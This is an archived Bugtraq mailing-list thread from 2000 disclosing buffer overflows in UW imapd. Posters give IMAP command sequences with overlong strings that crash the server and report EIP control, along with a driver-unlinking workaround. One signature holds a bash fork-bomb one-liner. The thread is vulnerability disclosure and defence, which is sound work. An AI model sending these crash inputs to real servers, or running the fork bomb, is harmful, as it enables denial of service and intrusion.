5013641 2000-04-17 05:11 /41 rader/ Postmaster
Mottagare: Bugtraq (import) <10491>
Ärende: imapd4r1 v12.264
------------------------------------------------------------
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: BUGTRAQ@SECURITYFOCUS.COM
X-Hate: Where do you want to go to die?
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=ISO-8859-2
Message-ID: <Pine.LNX.4.21.0004161411480.2819-100000@dione.ids.pl>
Date: Sun, 16 Apr 2000 14:19:43 +0200
Reply-To: Michal Zalewski <lcamtuf@DIONE.IDS.PL>
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: Michal Zalewski <lcamtuf@DIONE.IDS.PL>
X-To: BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from QUOTED-PRINTABLE to 8bit by samantha.lysator.liu.se id FAA28042
Newest RH:
* OK nimue IMAP4rev1 v12.264 server ready
1 login lcamtuf test
1 OK LOGIN completed
1 list "" AAAAAAAAAAAAAAAAAAAAAAAAAAA...[yes, a lot of 'A's ;]
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
*sigh*
Privledges seems to be dropped, but, anyway, it's nice way to get
shell access to mail account, maybe grab some data from memory etc. I
believe both imap and ipopd packages need code security audit.
_______________________________________________________
Michal Zalewski [lcamtuf@tpi.pl] [tp.internet/security]
[http://lcamtuf.na.export.pl] <=--=> bash$ :(){ :|:&};:
=-----=> God is real, unless declared integer. <=-----=
===========================================================================
List przyszed³ z listy <secure@mud.pl>
(5013641) ------------------------------------------(Ombruten)
5017185 2000-04-17 22:43 /88 rader/ Postmaster
Mottagare: Bugtraq (import) <10498>
Ärende: Re: imapd4r1 v12.264
------------------------------------------------------------
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: BUGTRAQ@SECURITYFOCUS.COM
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; CHARSET=US-ASCII
Message-ID: <200004171304.PAA06635@rincewind.msc-media.de>
Date: Mon, 17 Apr 2000 15:04:41 +0200
Reply-To: Sven Carstens <s.carstens@GMX.DE>
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: Sven Carstens <s.carstens@GMX.DE>
X-To: BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <Pine.LNX.4.21.0004161411480.2819-100000@dione.ids.pl>
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from QUOTED-PRINTABLE to 8bit by samantha.lysator.liu.se id WAA10109
Am So, 16 Apr 2000 schrieb Michal Zalewski <lcamtuf@DIONE.IDS.PL>:
> Newest RH:
>
> * OK nimue IMAP4rev1 v12.264 server ready
This is the imap-4.7 package from the University of Washington.
> 1 login lcamtuf test
> 1 OK LOGIN completed
> 1 list "" AAAAAAAAAAAAAAAAAAAAAAAAAAA...[yes, a lot of 'A's ;]
> Program received signal SIGSEGV, Segmentation fault.
> 0x41414141 in ?? ()
>
To segfault the number of A´s has to in the range 1023 < #A > 8180.
If the command line including CR/LF is longer than 8192 an error
message is displayed.
The segfaults are in the nntp, mh, news and dummy driver. In all
modules the subroutine <name>_canonicalize will happily strcpy and
strcat the user supplied arguments to fixed size buffers with
normally MAILTMPLEN = 1024 bytes.
Quick work around:
- remove these modules (if you don´t require them) from the linkage
list
To do this change imapd.c around line 247
remove this line:
#include "linkage.c"
and manually add the drivers and authenticators you need:
mail_link (&mboxdriver); /* link in the mbox driver */
mail_link (&imapdriver); /* link in the imap driver */
/* mail_link (&nntpdriver); /* link in the nntp driver */
mail_link (&pop3driver); /* link in the pop3 driver */
/* mail_link (&mhdriver); /* link in the mh driver */
mail_link (&mxdriver); /* link in the mx driver */
mail_link (&mbxdriver); /* link in the mbx driver */
mail_link (&tenexdriver); /* link in the tenex driver */
mail_link (&mtxdriver); /* link in the mtx driver */
mail_link (&mmdfdriver); /* link in the mmdf driver */
mail_link (&unixdriver); /* link in the unix driver */
/* mail_link (&newsdriver); /* link in the news driver */
mail_link (&philedriver); /* link in the phile driver */
/* mail_link (&dummydriver); /* link in the dummy driver */
auth_link (&auth_md5); /* link in the md5 authenticator */
auth_link (&auth_log); /* link in the log authenticator */
This list is taken from my default install. If might have extra
authenticators in your configuration. See the file
imap-4.7/c-client/linkage.c
for the drivers of your choice.
It might also be wise to remove all unneede drivers from the list to
gain speed/security.
There are shure as hell a lot more careless strcpy´s inside this code.
BTW: Looking for another library for mail folder access!
> *sigh*
>
> Privledges seems to be dropped, but, anyway, it's nice way to get shell
> access to mail account, maybe grab some data from memory etc. I believe
> both imap and ipopd packages need code security audit.
>
The security audit is really needed for all of the drivers in the
c-client. (Anyone cares for a Y2K bug in this ?)
CU Sven
(5017185) ------------------------------------------(Ombruten)
5017188 2000-04-17 22:45 /70 rader/ Postmaster
Mottagare: Bugtraq (import) <10499>
Ärende: Re: imapd4r1 v12.264
------------------------------------------------------------
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: bugtraq@securityfocus.com
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-sha1
protocol="application/pgp-signature"; boundary="u3bvv0EcKsvvYeex"
X-Operating-System: Linux 2.2.13 on an i586 LINUX Power!!
X-IRC: FuturE on IRC-Net
X-PGP-Key: http://c0re.phuture.sk/future/kontakt.shtml
Message-ID: <20000417123800.J2782@phuture.sk>
Date: Mon, 17 Apr 2000 12:38:00 +0200
Reply-To: Tibor.Pittich@phuture.sk
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: Tibor Pittich <Tibor.Pittich@phuture.sk>
Organization: Computer Centre CHTF STU Bratislava
X-To: bugtraq@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <Pine.LNX.4.21.0004161411480.2819-100000@dione.ids.pl>
--u3bvv0EcKsvvYeex
Content-Type: text/plain; charset=iso-8859-2
Content-Transfer-Encoding: quoted-printable
On 16. Apr 2000 o 14:19, Michal Zalewski wrote:
> * OK nimue IMAP4rev1 v12.264 server ready
> 1 login lcamtuf test
> 1 OK LOGIN completed
> 1 list "" AAAAAAAAAAAAAAAAAAAAAAAAAAA...[yes, a lot of 'A's ;]=20
> Program received signal SIGSEGV, Segmentation fault.
> 0x41414141 in ?? ()
Older version, imap-4.5-4 seems to be ok..
* OK localhost IMAP4rev1 v12.250 server ready
1 login test test
1 OK LOGIN completed
1 list "" 'lot of AAAAA....'
1 OK LIST completed
in other imap-4.6-3 too:
* OK localhost IMAP4rev1 v12.252 server ready
1 login future test
1 OK LOGIN completed
1 list "" 'lot of AAAA......'
1 OK LIST completed
I think, this is new "feature" coming from Washington university;)
Best regards
--=20
+------------------------+------------------------------------------------+
+ Tibor "FuturE" Pittich | Email : Tibor.Pittich@phuture.sk
+------------------------+ HomePage : http://c0re.phuture.sk/future
PGPkey v5.0i: pgpk -a finger://c0re.phuture.sk/future
+-------------------------> p=ED=B9te mi v ISO-8859-2 <--------------------=
---+
--u3bvv0EcKsvvYeex
Content-Type: application/pgp-signature
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.0 (GNU/Linux)
Comment: For info see http://www.gnupg.org
iD8DBQE4+umIjtVzQtYTy78RAqgTAJ9Wirak6tDim9svZAWw8xweb58ZJgCgjzLX
gIJ7mszVwR721a4uquJ+wjs=
=NmH2
-----END PGP SIGNATURE-----
--u3bvv0EcKsvvYeex--
(5017188) ------------------------------------------
5029757 2000-04-21 20:19 /42 rader/ Postmaster
Mottagare: Bugtraq (import) <10564>
Ärende: another WU imapd buffer overflow
------------------------------------------------------------
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: bugtraq@securityfocus.com
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Organization: Is it really so important?
Message-ID: <20000421021218.A693@clico.pl>
Date: Fri, 21 Apr 2000 02:12:18 +0200
Reply-To: Michal Szymanski <siva9@CLICO.PL>
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: Michal Szymanski <siva9@CLICO.PL>
X-To: bugtraq@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM
Hi,
While doing code security audit, I discovered another buffer overflow
in imapd. This time security flaw exist in standard rfc 1064 COPY
command:
* OK mail IMAP4rev1 v12.264 server ready login siva9 secret OK LOGIN
* completed select inbox 2 EXISTS 0 RECENT OK [UIDVALIDITY 956162550]
* UID validity status OK [UIDNEXT 5] Predicted next UID FLAGS
* (\Answered \Flagged \Deleted \Draft \Seen) OK [PERMANENTFLAGS (\*
* \Answered \Flagged \Deleted \Draft \Seen)] Permanent flags OK
* [UNSEEN 2] first unseen message in /var/spool/mail/siva9 OK
* [READ-WRITE] SELECT completed copy 1
* AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ... [a lot of A's]
No answer. Process has been killed by SIGSEGV. Number of A's must be
in range from 1017 to 8180. After LOGIN all privileges are dropped,
but we still have possibility to get unprivileged shell access. I've
tested it against WU imapd v10.223, v11.241, v12.250, v12.261, and
v12.264.
Regards,
Michal Szymanski [michal_szymanski@linux.com.pl];
(5029757) ------------------------------------------(Ombruten)
X-Organization: Is it really so important?
Message-ID: <20000422002433.A5056@clico.pl>
Date: Sat, 22 Apr 2000 00:24:33 +0200
Reply-To: Michal Szymanski <siva9@CLICO.PL>
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: Michal Szymanski <siva9@CLICO.PL>
X-To: bugtraq@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM
Hi again,
imapd seems to be very weak. I've found another three buffer overruns.
This time affected commands are LSUB, RENAME and FIND:
* OK mail IMAP4rev1 v12.264 server ready
* login siva9 secret
* OK LOGIN completed
* lsub "" AAAAAAAAAAAAA.... (#A 1024 - 8179)
SIGSEGV received.
* OK localhost IMAP4rev1 v12.264 server ready
* login siva9 secret
* OK LOGIN completed
* rename inbox AAAAAAAAAAAAA.... (#A 1021 - 8174)
SIGSEGV received.
* OK localhost IMAP4rev1 v12.264 server ready
* login siva9 secret
* OK LOGIN completed
* find all.mailboxes AAAAAAAAAAAAA.... (#A 1026 - 8168)
SIGSEGV received.
It seems that all two-argument commands in authenticated state -
where second argument is string - are vulnerable. I'm not sure, but
ipop2/3d works fine in all states, also in transaction state. Mark,
Am I right?
Regards,
Michal Szymanski [michal_szymanski@linux.com.pl];
(5030541) ------------------------------------------(Ombruten)